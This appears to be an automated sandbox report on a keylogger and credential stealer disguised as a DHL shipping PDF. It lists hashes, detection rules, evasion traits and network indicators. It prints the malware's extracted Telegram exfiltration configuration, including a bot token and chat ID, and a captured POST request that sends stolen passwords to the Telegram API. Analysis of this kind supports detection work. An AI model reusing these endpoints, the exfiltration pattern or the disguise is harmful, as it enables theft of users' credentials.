Windows Analysis Report
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Overview

General Information

Sample name: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Analysis ID: 1632027
MD5: de509e89b502f4ff95d4c40bdc532816
SHA1: 0deb0d30f591bb0f086dba33f9724933dd108376
SHA256: 8be24b4a43a08fa9f9800c60d3da03062ddb912f6a8c702d3ca58bc465788516
Tags: DHL, exe, user-abuse_ch

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
PE file has nameless sections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
{"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}
Source | Rule | Description | Author
00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
Strings:
          • 0xefb7:$a1: get_encryptedPassword
          • 0xf2df:$a2: get_encryptedUsername
          • 0xed52:$a3: get_timePasswordChanged
          • 0xee73:$a4: get_passwordField
          • 0xefcd:$a5: set_encryptedPassword
          • 0x10929:$a7: get_logins
          • 0x105da:$a8: GetOutlookPasswords
          • 0x103cc:$a9: StartKeylogger
          • 0x10879:$a10: KeyLoggerEventArgs
          • 0x10429:$a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author
2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
Strings:
                  • 0xf1b7:$a1: get_encryptedPassword
                  • 0xf4df:$a2: get_encryptedUsername
                  • 0xef52:$a3: get_timePasswordChanged
                  • 0xf073:$a4: get_passwordField
                  • 0xf1cd:$a5: set_encryptedPassword
                  • 0x10b29:$a7: get_logins
                  • 0x107da:$a8: GetOutlookPasswords
                  • 0x105cc:$a9: StartKeylogger
                  • 0x10a79:$a10: KeyLoggerEventArgs
                  • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                  No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T18:41:26.645424+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49688 | 149.154.167.220 | 443 | TCP
2025-03-07T18:41:13.861289+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49684 | 132.226.247.73 | 80 | TCP
2025-03-07T18:41:23.033169+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49684 | 132.226.247.73 | 80 | TCP
2025-03-07T18:41:25.644491+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.10 | 49688 | 149.154.167.220 | 443 | TCP

                  AV Detection

Source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.6984.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | ReversingLabs: Detection: 52%
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Virustotal: Detection: 62%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49685 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49688 version: TLS 1.2
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49688 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49688 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd5d755d711b1c | Host: api.telegram.org | Content-Length: 1088 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.80.1
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49684 -> 132.226.247.73:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd5d755d711b1c | Host: api.telegram.org | Content-Length: 1088 | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 443

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode

                  System Summary

Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: section name: AGB[a"h3
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: section name:
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Static PE information: invalid certificate
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1111503634.000000000A8C0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1111394214.000000000A890000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.00000000046F5000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1105672095.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3534770188.000000000041A000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3535022261.0000000000BE7000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Binary or memory string: OriginalFilenameZzdw.exeX vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: Section: AGB[a"h3 ZLIB complexity 1.0003868508454106
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.log
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Mutant created: NULL
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3538427208.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe ReversingLabs: Detection: 52%
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Virustotal: Detection: 62%
                  Source: unknown Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
